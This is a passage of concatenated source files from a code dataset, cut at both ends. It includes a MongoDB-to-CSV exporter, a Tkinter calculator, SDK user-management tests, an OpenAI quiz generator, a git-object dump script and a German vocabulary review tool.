{}\".format(sub_source_key))\n for sub_name in extract_fieldnames(sub_fields):\n extracted[parent+str(sub_source_key)+'/'+sub_name] = None\n return extracted\n\n\n# Extract just the fieldnames from a tree structure\ndef extract_fieldnames(fields, parent='') -> list:\n fieldnames = []\n for field in fields:\n if type(field) is not dict:\n fieldnames.append(parent + str(field))\n else:\n fieldnames.extend(extract_fieldnames(tuple(field.values())[0], parent+str(tuple(field.keys())[0])+'/'))\n return fieldnames\n\n\n# Runs the export script and creates a csv file.\n# Give the field names in like a list/tuple like: ['price', 'color']\n# A field within a field can be done like this: ['price', {'prop': ['brand', 'unit']}, 'color']\n# Translating multiple fields with the same name should be given like this:\n# {'prop/unit': 'ProdID', 'cstm/unit': 'deviceID', 'color': 'Color'}\ndef execute_export(collection_name, fields, sample_size=None, translation=None,\n export_name=None, db_name='huwebshop', mongo_ip='mongodb://localhost:27017/'):\n if translation is None:\n translation = dict()\n\n # Setup connection to MongoDB\n myclient = pymongo.MongoClient(mongo_ip)\n db = myclient[db_name]\n col = db[collection_name]\n print(\"Connected to MongoDB...\")\n\n # Get the data from MongoDB\n finds = col.find()\n if sample_size is not None:\n finds = finds[:sample_size]\n print(\"Data received...\")\n\n # Write as csv file\n field_names = extract_fieldnames(fields)\n if export_name is None:\n export_name = collection_name\n filename = 'csvs/{}.csv'.format(export_name)\n print(\"Writing to {}...\".format(filename))\n with open(filename, 'w') as file:\n file.write(create_header(field_names, translation))\n\n writer = csv.DictWriter(file, field_names)\n i = 0\n for document in finds:\n row_dict = extract_fields(document, fields)\n writer.writerow(row_dict)\n\n i += 1\n if i % 10000 == 0:\n print(\"Written {} documents.\".format(i))\n print(\"Written {} documents.\".format(i))\n\n print(\"Done exporting.\")\n\n\nif __name__ == '__main__':\n m_collection_name = 'sessions'\n m_fields = ('_id', {'user_agent': [{'os': ['familiy', 'version_string']}]}, 'session_start', 'session_end')\n m_sample_size = 100\n execute_export(m_collection_name, m_fields, m_sample_size, export_name='Sessions')\n","repo_name":"Nouw/HU-SP-Formatief","sub_path":"exporter/CSV/mongo_to_csv.py","file_name":"mongo_to_csv.py","file_ext":"py","file_size_in_byte":4175,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"22240104287","text":"from tkinter import*\r\nfrom tkinter.messagebox import *\r\nimport math\r\nglobal Unos\r\nglobal poruka\r\nglobal Izlaz\r\nUnos=''\r\nporuka=''\r\nt=Tk()\r\nt.title('Kalkulator')\r\nt.geometry('400x500')\r\nt.config(bg='white')\r\nLabel(t,text='Rezultat: ',font=('Arial',20)).place(relx=1/20,rely=18/20)\r\nispis=Label(t,text=poruka)\r\nispis.place(relx=7/20,rely=18/20)\r\nispis.config(bg='white',font=('Arial',20,'bold'),fg='red')\r\n\r\ndef ispis():\r\n print('Funkcije:\\n1. ... \\n2. ... \\n ... \\nn. ...')\r\ndef primjeri():\r\n print('Primjer funkcije:\\n1. ...\\n2. ... \\n ... \\nn. ...')\r\nizbornik=Menu(t)\r\ndatoteka_izbornik=Menu(izbornik)\r\ndatoteka_izbornik.add_command(label='Popis funkcija',command=ispis)\r\ndatoteka_izbornik.add_command(label='Primjeri fukncija',command=primjeri)\r\nizbornik.add_cascade(label='Help',menu=datoteka_izbornik)\r\nt.config(menu=izbornik)\r\n\r\nLabel(t,text='Unos: ',font=('Arial',20)).place(relx=1/20,rely=1/50)\r\nulaz=Label(t,text=Unos)\r\nulaz.place(relx=3/11,rely=1/50)\r\nulaz.config(bg='white',font=('Arial',20,'bold'),fg='black')\r\ndef refreshIzlaz():\r\n ispis=Label(t,text=poruka)\r\n ispis.place(relx=7/20,rely=18/20)\r\n ispis.config(bg='white',font=('Arial',20,'bold'),fg='red')\r\n return\r\ndef refresh():\r\n ulaz=Label(t,text=Unos)\r\n ulaz.place(relx=3/11,rely=1/50)\r\n ulaz.config(bg='white',font=('Arial',20,'bold'),fg='black')\r\n return\r\n\r\ndef Ans():\r\n global Unos\r\n global Izlaz\r\n Unos+=str(Izlaz)\r\n refresh()\r\n return\r\ndef Unos1():\r\n global Unos\r\n Unos+='1'\r\n refresh()\r\n return\r\ndef Unos2():\r\n global Unos\r\n Unos+='2'\r\n refresh()\r\n return\r\ndef Unos3():\r\n global Unos\r\n Unos+='3'\r\n refresh()\r\n return\r\ndef Unos4():\r\n global Unos\r\n Unos+='4'\r\n refresh()\r\n return\r\ndef Unos5():\r\n global Unos\r\n Unos+='5'\r\n refresh()\r\n return\r\ndef Unos6():\r\n global Unos\r\n Unos+='6'\r\n refresh()\r\n return\r\ndef Unos7():\r\n global Unos\r\n Unos+='7'\r\n refresh()\r\n return\r\ndef Unos8():\r\n global Unos\r\n Unos+='8'\r\n refresh()\r\n return\r\ndef Unos9():\r\n global Unos\r\n Unos+='9'\r\n refresh()\r\n return\r\ndef Unos0():\r\n global Unos\r\n Unos+='0'\r\n refresh()\r\n return\r\ndef Unos_DT():\r\n global Unos\r\n a=Unos\r\n Reset()\r\n Unos=''\r\n for i in range(0,len(a)):\r\n Unos+=a[i]\r\n refresh()\r\n Unos+='.'\r\n refresh()\r\n return\r\ndef zbroji():\r\n global Unos\r\n Unos+=' + '\r\n refresh()\r\n return\r\ndef oduzmi():\r\n global Unos\r\n Unos+=' - '\r\n refresh()\r\n return\r\ndef pomnozi():\r\n global Unos\r\n Unos+=' * '\r\n refresh()\r\n return\r\ndef podijeli():\r\n global Unos\r\n Unos+=' / '\r\n refresh()\r\n return\r\ndef zagrada1():\r\n global Unos\r\n Unos+=' ( '\r\n refresh()\r\n return\r\ndef zagrada2():\r\n global Unos\r\n Unos+=' ) '\r\n refresh()\r\n return\r\ndef cos():\r\n global Unos\r\n Unos+=' cos '\r\n refresh()\r\n return\r\ndef sin():\r\n global Unos\r\n Unos+=' sin '\r\n refresh()\r\n return\r\ndef tg():\r\n global Unos\r\n Unos+=' tg '\r\n refresh()\r\n return\r\ndef ln():\r\n global Unos\r\n Unos+=' ln '\r\n refresh()\r\n return\r\ndef log():\r\n global Unos\r\n Unos+=' log '\r\n refresh()\r\n return\r\ndef space():\r\n global Unos\r\n Unos+=' '\r\n refresh()\r\n return\r\ndef fact():\r\n global Unos\r\n Unos+=' ! '\r\n refresh()\r\n return\r\ndef potencija():\r\n global Unos\r\n Unos+=' ^ '\r\n refresh()\r\n return\r\ndef povrh():\r\n global Unos\r\n Unos+=' povrh '\r\n refresh()\r\n return\r\ndef korijen():\r\n global Unos\r\n Unos+=' sqrt '\r\n refresh()\r\n return\r\ndef inverz():\r\n global Unos\r\n Unos+=' ^-1 '\r\n refresh()\r\ndef ABS():\r\n global Unos\r\n Unos+=' ABS '\r\n refresh()\r\ndef Exit():\r\n t.destroy()\r\n return\r\ndef Reset():\r\n global Unos\r\n global poruka\r\n global Izlaz\r\n Izlaz=0\r\n Unos=' '\r\n poruka=' '\r\n refresh()\r\n Unos=''\r\n refresh()\r\n refreshIzlaz()\r\n return\r\ndef Reset_bez_izlaza():\r\n global Unos\r\n global poruka\r\n global Izlaz\r\n Unos=' '\r\n poruka=' '\r\n refresh()\r\n Unos=''\r\n refresh()\r\n refreshIzlaz()\r\n return\r\ndef Delete():\r\n global Unos\r\n global poruka\r\n a=Unos\r\n Reset_bez_izlaza()\r\n Unos=''\r\n for i in range(0,len(a)-2):\r\n Unos+=a[i]\r\n refresh()\r\n return\r\ndef Calculate(x,y,radnja):\r\n if (radnja=='+'):\r\n return(x+y)\r\n elif(radnja=='-'):\r\n return(x-y)\r\n elif(radnja=='*'):\r\n return(x*y)\r\n elif(radnja=='/'):\r\n return(x/y)\r\ndef CalcZagrada():\r\n global Unos\r\n global Izlaz\r\n global parametri\r\n i=0\r\n Izlaz=0\r\n while(parametri[i]!='('):\r\n i+=1\r\n while(parametri[i]=='('):\r\n i+=1\r\n if(parametri[i-1]=='(' and parametri[i+1]==')'):\r\n del parametri[i+1]\r\n del parametri[i-1]\r\n Izlaz=float(parametri[i-1])\r\n else:\r\n Izlaz+=Calculate(float(parametri[i]),float(parametri[i+2]),parametri[i+1])\r\n parametri.insert(i,Izlaz)\r\n del parametri[i+1]\r\n del parametri[i+1]\r\n del parametri[i+1]\r\n del parametri[i+1]\r\n del parametri[i+-1]\r\n return\r\ndef CalcCos():\r\n global Unos\r\n global Izlaz\r\n global parametri\r\n i=0\r\n Izlaz=0\r\n while (parametri[i]!='cos'):\r\n i+=1\r\n del parametri[i]\r\n Izlaz=math.cos(float(parametri[i]))\r\n parametri.insert((i),Izlaz)\r\n del parametri[i+1]\r\n return\r\ndef CalcSin():\r\n global Unos\r\n global Izlaz\r\n global parametri\r\n i=0\r\n Izlaz=0\r\n while (parametri[i]!='sin'):\r\n i+=1\r\n del parametri[i]\r\n Izlaz=math.sin(float(parametri[i]))\r\n parametri.insert((i),Izlaz)\r\n del parametri[i+1]\r\n return\r\ndef CalcTg():\r\n global Unos\r\n global Izlaz\r\n global parametri\r\n i=0\r\n Izlaz=0\r\n while (parametri[i]!='tg'):\r\n i+=1\r\n del parametri[i]\r\n Izlaz=math.tan(float(parametri[i]))\r\n parametri.insert((i),Izlaz)\r\n del parametri[i+1]\r\n return\r\ndef Calcpotencija():\r\n global Unos\r\n global Izlaz\r\n global parametri\r\n i=0\r\n Izlaz=0\r\n while (parametri[i]!='^'):\r\n i+=1\r\n del parametri[i]\r\n Izlaz=(float(parametri[i-1]))**(float(parametri[i]))\r\n parametri.insert((i-1),Izlaz)\r\n del parametri[i]\r\n del parametri[i]\r\n return\r\ndef CalcLN():\r\n global Unos\r\n global Izlaz\r\n global parametri\r\n i=0\r\n Izlaz=0\r\n while (parametri[i]!='ln'):\r\n i+=1\r\n del parametri[i]\r\n Izlaz=math.log((float(parametri[i])),2.718281)\r\n parametri.insert((i-1),Izlaz)\r\n del parametri[i]\r\n return\r\ndef CalcLOG():\r\n global Unos\r\n global Izlaz\r\n global parametri\r\n i=0\r\n Izlaz=0\r\n while (parametri[i]!='log'):\r\n i+=1\r\n del parametri[i]\r\n Izlaz=math.log(float(parametri[i+1]),(float(parametri[i])))\r\n parametri.insert((i-1),Izlaz)\r\n del parametri[i]\r\n del parametri[i]\r\n return\r\ndef Calcfaktorijel():\r\n global Unos\r\n global Izlaz\r\n global parametri\r\n suma=1\r\n i=0\r\n Izlaz=0\r\n while (parametri[i]!='!'):\r\n i+=1\r\n br=i\r\n del parametri[i]\r\n for i in range(1,int(parametri[i])+1):\r\n suma*=i\r\n Izlaz=suma\r\n del parametri[br]\r\n parametri.insert(i,Izlaz)\r\ndef F(parametar):\r\n suma=1\r\n i=0\r\n for i in range(1,parametar+1):\r\n suma*=i\r\n return(suma)\r\ndef CalcPovrh():\r\n global Unos\r\n global Izlaz\r\n global parametri\r\n suma=1\r\n i=0\r\n Izlaz=0\r\n while (parametri[i]!='povrh'):\r\n i+=1\r\n br=i\r\n del parametri[i]\r\n Izlaz=((F(int(parametri[i-1])))/((F(int(parametri[i])))*(F((int(parametri[i-1]))-(int(parametri[i]))))))\r\n del parametri[i-1]\r\n del parametri[i-1]\r\n parametri.insert(i,Izlaz)\r\ndef CalcSqrt():\r\n global Unos\r\n global Izlaz\r\n global parametri\r\n i=0\r\n Izlaz=0\r\n while (parametri[i]!='sqrt'):\r\n i+=1\r\n del parametri[i]\r\n Izlaz=math.sqrt(float(parametri[i]))\r\n del parametri[i]\r\n parametri.insert(i,Izlaz)\r\n return\r\ndef CalcInverz():\r\n global Unos\r\n global Izlaz\r\n global parametri\r\n i=0\r\n Izlaz=0\r\n while (parametri[i]!='^-1'):\r\n i+=1\r\n del parametri[i]\r\n Izlaz=(float(parametri[i-2]))**(-1)\r\n parametri.insert((i-1),Izlaz)\r\n del parametri[i]\r\n return\r\n \r\n \r\n\r\ndef Calc():\r\n global Unos\r\n global Izlaz\r\n global parametri\r\n global poruka\r\n parametri=Unos.split()\r\n for i in range(len(parametri)):\r\n if (parametri[i]==' '):\r\n parametri[i]=''\r\n while ('(' in parametri):\r\n CalcZagrada()\r\n while('cos' in parametri):\r\n CalcCos()\r\n while('sin' in parametri):\r\n CalcSin()\r\n while('tg' in parametri):\r\n CalcTg()\r\n while('^' in parametri):\r\n Calcpotencija()\r\n while('ln' in parametri):\r\n CalcLN()\r\n while('log' in parametri):\r\n CalcLOG()\r\n while ('(' in parametri):\r\n CalcZagrada()\r\n while('!' in parametri):\r\n Calcfaktorijel()\r\n while('povrh' in parametri):\r\n CalcPovrh()\r\n while ('sqrt' in parametri):\r\n CalcSqrt()\r\n while('^-1' in parametri):\r\n CalcInverz()\r\n while('ABS' in parametri):\r\n i=0\r\n b=''\r\n a=''\r\n Izlaz=0\r\n while (parametri[i] != 'ABS'):\r\n i+=1\r\n del parametri[i]\r\n a=parametri[i]\r\n if(a!='-'):\r\n Izlaz=parametri[i]\r\n else:\r\n Izlaz=parametri[i+1]\r\n parametri.insert(i,Izlaz)\r\n del parametri[i+1]\r\n del parametri[i+1]\r\n print(parametri)\r\n while ('*' in parametri):\r\n i=0\r\n Izlaz=0\r\n while (parametri[i] != '*'):\r\n i+=1\r\n Izlaz+=(float(parametri[i-1])*float(parametri[i+1]))\r\n del parametri[i+1]\r\n del parametri[i]\r\n del parametri[i-1]\r\n parametri.insert((i-1),Izlaz)\r\n while ('/' in parametri):\r\n i=0\r\n Izlaz=0\r\n while (parametri[i] != '/'):\r\n i+=1\r\n Izlaz+=(float(parametri[i-1]) / float(parametri[i+1]))\r\n del parametri[i+1]\r\n del parametri[i]\r\n del parametri[i-1]\r\n parametri.insert((i-1),Izlaz)\r\n while ('+' in parametri):\r\n i=0\r\n Izlaz=0\r\n while (parametri[i] != '+'):\r\n i+=1\r\n Izlaz+=(float(parametri[i-1]) + float(parametri[i+1]))\r\n del parametri[i+1]\r\n del parametri[i]\r\n del parametri[i-1]\r\n parametri.insert((i-1),Izlaz)\r\n while ('-' in parametri):\r\n i=0\r\n Izlaz=0\r\n while (parametri[i] != '-'):\r\n i+=1\r\n Izlaz+=(float(parametri[i-1]) - float(parametri[i+1]))\r\n del parametri[i+1]\r\n del parametri[i]\r\n del parametri[i-1]\r\n parametri.insert((i-1),Izlaz)\r\n poruka=Izlaz\r\n refreshIzlaz()\r\n return\r\n\r\n\r\nButton(t,text='1',command=Unos1,bg='lightblue',font=('Arial',15)).place(x=30,y=120)\r\nButton(t,text='2',command=Unos2,bg='lightblue',font=('Arial',15)).place(x=65,y=120)\r\nButton(t,text='3',command=Unos3,bg='lightblue',font=('Arial',15)).place(x=100,y=120)\r\nButton(t,text='4',command=Unos4,bg='lightblue',font=('Arial',15)).place(x=135,y=120)\r\nButton(t,text='5',command=Unos5,bg='lightblue',font=('Arial',15)).place(x=30,y=170)\r\nButton(t,text='6',command=Unos6,bg='lightblue',font=('Arial',15)).place(x=65,y=170)\r\nButton(t,text='7',command=Unos7,bg='lightblue',font=('Arial',15)).place(x=100,y=170)\r\nButton(t,text='8',command=Unos8,bg='lightblue',font=('Arial',15)).place(x=135,y=170)\r\nButton(t,text='9',command=Unos9,bg='lightblue',font=('Arial',15)).place(x=30,y=220)\r\nButton(t,text='0',command=Unos0,bg='lightblue',font=('Arial',15)).place(x=65,y=220)\r\nButton(t,text='.',command=Unos_DT,bg='lightblue',font=('Arial',15)).place(x=100,y=220)\r\n\r\nButton(t,text='=',command=Calc,bg='blue',font=('Arial',16)).place(x=135,y=220)\r\nButton(t,text='(',command=zagrada1,bg='blue',font=('Arial',16)).place(x=190,y=220)\r\nButton(t,text=')',command=zagrada2,bg='blue',font=('Arial',16)).place(x=225,y=220)\r\nButton(t,text='Space',command=space,bg='blue',font=('Arial',16)).place(x=95,y=270)\r\n\r\nButton(t,text='!',command=fact,bg='purple',font=('Arial',16)).place(x=190,y=270)\r\nButton(t,text='povrh',command=povrh,bg='purple',font=('Arial',16)).place(x=225,y=270)\r\nButton(t,text='sqrt',command=korijen,bg='purple',font=('Arial',16)).place(x=300,y=270)\r\nButton(t,text='Ans',command=Ans,bg='pink',font=('Arial',15)).place(x=30,y=270)\r\n\r\nButton(t,text='cos',command=cos,bg='yellow',font=('Arial',16)).place(x=315,y=170)\r\nButton(t,text='sin',command=sin,bg='yellow',font=('Arial',16)).place(x=265,y=170)\r\nButton(t,text='tg',command=tg,bg='yellow',font=('Arial',16)).place(x=275,y=120)\r\nButton(t,text='^n',command=potencija,bg='yellow',font=('Arial',16)).place(x=320,y=120)\r\n\r\nButton(t,text='ln',command=ln,bg='lightgreen',font=('Arial',16)).place(x=260,y=220)\r\nButton(t,text='log B (x)',command=log,bg='lightgreen',font=('Arial',16)).place(x=300,y=220)\r\n\r\nButton(t,text='^-1',command=inverz,bg='lightgreen',font=('Arial',16)).place(x=300,y=320)\r\nButton(t,text='ABS',command=ABS,bg='lightgreen',font=('Arial',16)).place(x=230,y=320)\r\n\r\n\r\nButton(t,text='Exit',command=Exit,bg='red',font=('Arial',16)).place(x=325,y=400)\r\nButton(t,text='Reset',command=Reset,bg='red',font=('Arial',16)).place(x=30,y=70)\r\n\r\nButton(t,text='Delete',command=Delete,bg='orange',font=('Arial',16)).place(x=110,y=70)\r\n\r\n\r\nButton(t,text='+',command=zbroji,bg='blue',font=('Arial',15)).place(x=190,y=120)\r\nButton(t,text='-',command=oduzmi,bg='blue',font=('Arial',15)).place(x=225,y=120)\r\nButton(t,text='*',command=pomnozi,bg='blue',font=('Arial',15)).place(x=190,y=170)\r\nButton(t,text='/',command=podijeli,bg='blue',font=('Arial',15)).place(x=225,y=170)\r\nt.mainloop()\r\n","repo_name":"Luka-sasko/Python","sub_path":"Kalkulator.py","file_name":"Kalkulator.py","file_ext":"py","file_size_in_byte":13846,"program_lang":"python","lang":"sr","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"42962347124","text":"import os\nimport pytest\nimport tomli\nfrom zsdk.zia import zia\nimport random\n\napp_dir = os.path.dirname(os.path.abspath(__file__))\nconfig_path = os.path.join(app_dir, \"config.toml\")\n\nwith open(config_path, \"rb\") as cf:\n config = tomli.load(cf)\n\n\n@pytest.fixture(scope=\"module\")\ndef tenant():\n return zia(\n config[\"PARENT\"][\"username\"],\n config[\"PARENT\"][\"password\"],\n config[\"PARENT\"][\"api_key\"],\n config[\"PARENT\"][\"cloudId\"],\n )\n\n\n@pytest.fixture(scope=\"module\")\ndef test_user_data(tenant):\n return {\n \"name\": \"pytest user\",\n \"email\": \"pytest@tng-lab.org\",\n \"groups\": [\n random.choice(\n [\n {\"name\": group[\"name\"], \"id\": group[\"id\"]}\n for group in tenant.groups.list()\n ]\n )\n ],\n \"department\": random.choice(\n [\n {\"name\": dept[\"name\"], \"id\": dept[\"id\"]}\n for dept in tenant.departments.list()\n ]\n ),\n \"password\": \"Zscaler!123\",\n }\n\n\n# departments under user_management\n@pytest.mark.departments\ndef test_get(tenant):\n depts = [dept.get(\"id\") for dept in tenant.departments.list()]\n dept = tenant.departments.get(random.choice(depts))\n assert type(dept) is dict\n\n\n@pytest.mark.departments\ndef test_list(tenant):\n data = tenant.departments.list()\n assert type(data) is list\n assert len(data) != 0\n\n\n# groups under user_management\n@pytest.mark.groups\ndef test_list_groups(tenant):\n data = tenant.groups.list()\n assert type(data) is list\n assert len(data) > 0\n\n\n@pytest.mark.groups\ndef test_get_groups(tenant):\n groups = [group.get(\"id\") for group in tenant.groups.list()]\n group = tenant.groups.get(random.choice(groups))\n assert type(group) is dict\n assert group.get(\"id\") in groups\n\n\n# users under user_management\n@pytest.mark.users\ndef test_get_users(tenant):\n users = [user.get(\"id\") for user in tenant.users.list()]\n user = tenant.users.get(random.choice(users))\n assert type(user) is dict\n assert user.get(\"id\") in users\n\n\n@pytest.mark.users\ndef test_create_users(tenant, test_user_data):\n data = tenant.users.create(test_user_data)\n assert data.status_code == 200\n assert \"pytest@tng-lab.org\" in data.json().get(\"email\")\n\n\n@pytest.mark.users\ndef test_update_users(tenant):\n user = next(\n (user for user in tenant.users.list() if user[\"email\"] == \"pytest@tng-lab.org\"),\n None,\n )\n\n update_data = user\n\n update_data[\"name\"] = f\"{user.get('name')} Update\"\n\n result = tenant.users.update(user.get(\"id\"), update_data)\n\n assert result.status_code == 200\n assert \"Update\" in result.json().get(\"name\")\n\n\n@pytest.mark.users\ndef test_list_users(tenant):\n data = tenant.users.list()\n assert type(data) is list\n assert len(data) > 0\n\n\n@pytest.mark.users\ndef test_delete_users(tenant):\n user = next(\n (user for user in tenant.users.list() if user[\"email\"] == \"pytest@tng-lab.org\"),\n None,\n )\n\n result = tenant.users.delete(user.get(\"id\"))\n\n assert result.status_code == 204\n\n\n@pytest.mark.users\ndef test_bulk_delete_users(tenant): # TODO\n pass\n\n\n# auditors under user_management\n@pytest.mark.auditors\ndef test_list_auditors(tenant):\n result = tenant.auditors.list()\n assert type(result) is list\n\n\ndef test_activate(tenant):\n tenant.activate_changes()\n","repo_name":"SYNically-ACKward/zsdk","sub_path":"tests/zia/test_user_management.py","file_name":"test_user_management.py","file_ext":"py","file_size_in_byte":3417,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"29859198351","text":"import openai\nimport random\n\n\ndef Get_Question(arr):\n reference = random.randint(1, len(arr)-2)\n package = {\"reference\": reference, \"question\": ''}\n paragraph = arr[reference]\n question_type = random.randint(1, 2)\n\n if question_type == 1:\n package[\"question\"] = openai.Completion.create(\n model=\"text-davinci-003\",\n prompt=f\"You have taught the user {paragraph}. Now ask them a challenging hard multiple choice question that has only one \"\n f\"correct option without giving them the answer\",\n temperature=0.5,\n max_tokens=300,\n frequency_penalty=0.2,\n presence_penalty=0.0\n )[\"choices\"][0][\"text\"].strip()\n\n else:\n package[\"question\"] = openai.Completion.create(\n model=\"text-davinci-003\",\n prompt=f\"You have taught the user {paragraph}. Now ask them a challenging hard True or False question without giving them \"\n f\"the answer\",\n temperature=0.5,\n max_tokens=300,\n frequency_penalty=0.2,\n presence_penalty=0.0\n )[\"choices\"][0][\"text\"].strip()\n\n question = package[\"question\"]\n package[\"answer\"] = openai.Completion.create(\n model=\"text-davinci-003\",\n prompt=f\"Give answer to the following question and explain your solution with detail {question}\",\n temperature=0.25,\n max_tokens=400,\n frequency_penalty=0.0,\n presence_penalty=0.0\n )[\"choices\"][0][\"text\"].strip()\n\n return package\n","repo_name":"Adibvafa/MyCademy","sub_path":"website/Get_Question.py","file_name":"Get_Question.py","file_ext":"py","file_size_in_byte":1550,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"78"} +{"seq_id":"72013136893","text":"# -*- coding: utf-8 -*-\n# @Author : jjxu\n# @time: 2019/1/17 10:52\n\nfrom flask import request\nfrom flask_wtf import FlaskForm\nfrom app.libs.error_code import ParameterError\n\n\nclass BaseForm(FlaskForm):\n def __init__(self):\n super(BaseForm, self).__init__(data=request.json)\n\n def validate_for_api(self):\n valid = super(BaseForm, self).validate_on_submit()\n if not valid:\n raise ParameterError(self.errors)\n\n return self\n\n\n\n","repo_name":"xu20065953/FishBook_api","sub_path":"app/validators/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":467,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"15403353618","text":"from collections import defaultdict\n\nimport pandas as pd\n\nfrom ..rules.part import PART_LABELS\nfrom . import writer_utils as w_utils\n\nPARTS_SET = set(PART_LABELS + [\"multiple_parts\"])\n\n\nclass BaseCsvWriter:\n first = []\n\n def __init__(self, csv_file, csv_min=0):\n self.csv_file = csv_file\n self.csv_min = csv_min\n self.csv_rows = []\n\n def write(self, rows):\n csv_rows = self.format_all_rows(rows)\n df = pd.DataFrame(csv_rows)\n df = self.sort_df(df)\n\n with open(self.csv_file, \"w\") as out_file:\n out_file.write(\"** All sizes are given in centimeters. **\\n\")\n df.to_csv(out_file, index=False)\n\n def format_all_rows(self, rows):\n csv_rows = [self.format_row(r) for r in rows]\n return csv_rows\n\n def format_row(self, row):\n raise NotImplementedError\n\n def row_builder(self, row, csv_row):\n by_header = defaultdict(list)\n for trait in row.traits:\n if trait[\"trait\"] in PARTS_SET:\n continue\n\n key_set = set(trait.keys())\n\n if not (PARTS_SET & key_set):\n continue\n\n base_header = w_utils.html_label(trait)\n\n self.group_values_by_header(by_header, trait, base_header)\n self.number_columns(by_header, csv_row)\n return csv_row\n\n def sort_df(self, df):\n rest = [\n c\n for c in df.columns\n if c not in self.first and df[c].notna().sum() >= self.csv_min\n ]\n\n columns = self.first + sorted(rest)\n df = df[columns]\n return df\n\n @staticmethod\n def group_values_by_header(by_header, trait, base_header):\n filtered = {k: v for k, v in trait.items() if k not in w_utils.COLUMN_SKIPS}\n by_header[base_header].append(filtered)\n\n @staticmethod\n def number_columns(by_header, csv_row):\n for unnumbered_header, trait_list in by_header.items():\n for i, trait in enumerate(trait_list, 1):\n for key, value in trait.items():\n header = f\"{unnumbered_header}.{i}.{key}\"\n csv_row[header] = value\n","repo_name":"rafelafrance/FloraTraiter","sub_path":"flora/pylib/writers/base_csv_writer.py","file_name":"base_csv_writer.py","file_ext":"py","file_size_in_byte":2158,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"72397856893","text":"import os\r\nimport subprocess\r\nfrom subprocess import PIPE\r\n\r\ndank = next(os.walk('.'))[1]\r\n\r\nfor d in dank:\r\n dd = next(os.walk(d))\r\n sd = dd[0]\r\n od = dd[2]\r\n for zd in od:\r\n p = subprocess.Popen(['git','cat-file','-p',str(sd+zd)],stdin=PIPE,stdout=PIPE,stderr=PIPE)\r\n output, err = p.communicate()\r\n try:\r\n open(\"done/\"+str(sd+zd),\"w\").write(str(output.decode('utf-8')))\r\n print(sd+zd)\r\n except UnicodeDecodeError:\r\n print(\"Failed to decode\")\r\n","repo_name":"coffee2142/gitfile-enumerator","sub_path":"enum.py","file_name":"enum.py","file_ext":"py","file_size_in_byte":592,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"74778455611","text":"#!/usr/bin/python3\n\nimport os\nimport sys\n\n\n#\n# Main function\n#\n\nif __name__ == \"__main__\":\n\n if len(sys.argv) != 1:\n print('Usage: ExtractMeasures.py ')\n sys.exit()\n\n os.system('ls > directories.txt')\n file1 = open('directories.txt','r')\n dirname = file1.readline()\n while (dirname):\n dirname = dirname.split('\\n')[0]\n if ((dirname != 'PanicleMeasures.csv') and\n (dirname != 'ExtraPanicleMeasures.csv') and\n (dirname != 'directories.txt') and \n (dirname != 'filenames.txt')):\n command = 'ls ' + dirname + '/originals/*.jpg' + ' > filenames.txt'\n os.system(command)\n file2 = open('filenames.txt','r')\n filename = file2.readline()\n while (filename):\n filename = filename.split('/')[-1]\n filename = filename.split('\\n')[0]\n command = 'iftPanicleMeasures ' + './' + dirname + ' ' + filename\n print(command)\n os.system(command)\n filename = file2.readline()\n file2.close()\n dirname = file1.readline() \n file1.close()\n os.system('rm directories.txt filenames.txt') \n sys.exit()\n","repo_name":"jdetras/PANorama3.0","sub_path":"python/ExtractMeasures.py","file_name":"ExtractMeasures.py","file_ext":"py","file_size_in_byte":1226,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"40539044424","text":"import csv\nimport openai\nimport os\nimport random\nfrom datetime import datetime, timedelta\n\nfile_path = \"A1Wortlist.csv\"\n\n\ndef recreate_wortlist():\n input_file = \"A1Wortlist-backup.csv\"\n output_file = \"A1Wortlist.csv\"\n\n # Read the file and process each line\n with open(input_file, 'r') as file:\n lines = file.readlines()\n\n processed_lines = []\n\n for index, line in enumerate(lines, start=1):\n stripped_line = line.rstrip() # Remove trailing spaces\n if index == 1:\n modified_line = \"Wort, reviewFrequency, reviewDate\"\n else:\n modified_line = stripped_line + ',,' # Add two commas to the end\n processed_lines.append(modified_line + '\\n') # Add newline character\n\n # Write the processed lines back to the same file\n with open(output_file, 'w') as file:\n file.writelines(processed_lines)\n\n print(\"File processing complete.\")\n\n\ndef get_completion_from_messages(messages, model=\"gpt-3.5-turbo\", temperature=0.0, max_tokens=500):\n openai.api_key = os.getenv('OPENAI_API_KEY')\n # print(\"Get completion message: \", messages)\n response = openai.ChatCompletion.create(\n model=model,\n messages=messages,\n temperature=temperature,\n max_tokens=max_tokens,\n )\n return response.choices[0].message[\"content\"]\n\n\ndef chooseSelectedWords():\n # Go through the file\n # Add 10 words with today's date or earlier to selected words as array: [word, line number in wortLines]\n # Also in the case that 10 words are not found, keep an array of [word,line number] that do not have reviewData\n # Then check for the number of not found words,\n # and choose that number from the array in random and add to the selected words array\n wortLines = []\n selected_words_lineNumber = []\n not_reviewed_words = []\n number_burned = 0\n with open(file_path, 'r') as file:\n # num_lines = sum(1 for line in file)\n # print(f\"num_lines: {num_lines}\")\n for lineNumber, line in enumerate(file, start=0):\n line = line.strip()\n lineElements = line.split(',')\n wortLines.append(line.split(','))\n if lineNumber >= 1:\n\n word = lineElements[0]\n reviewFrequency = lineElements[1]\n reviewDateString = lineElements[2]\n\n if reviewDateString == \"\":\n not_reviewed_words.append([word, lineNumber])\n elif reviewFrequency != \"B\":\n reviewDateObject = datetime.strptime(reviewDateString, \"%Y-%m-%d\").date()\n today = datetime.now().date()\n if reviewDateObject <= today and len(selected_words_lineNumber) < 10:\n selected_words_lineNumber.append([word, lineNumber])\n elif reviewFrequency == \"B\":\n number_burned = number_burned + 1\n\n print(\"Number of selected words using reviewDate:\", len(selected_words_lineNumber))\n\n # Check if selected_words has 10 orders or add random words to it\n num_selected_words = len(selected_words_lineNumber)\n if num_selected_words < 10:\n num_missing = 10 - num_selected_words\n if num_missing <= len(not_reviewed_words):\n random_word_indices = 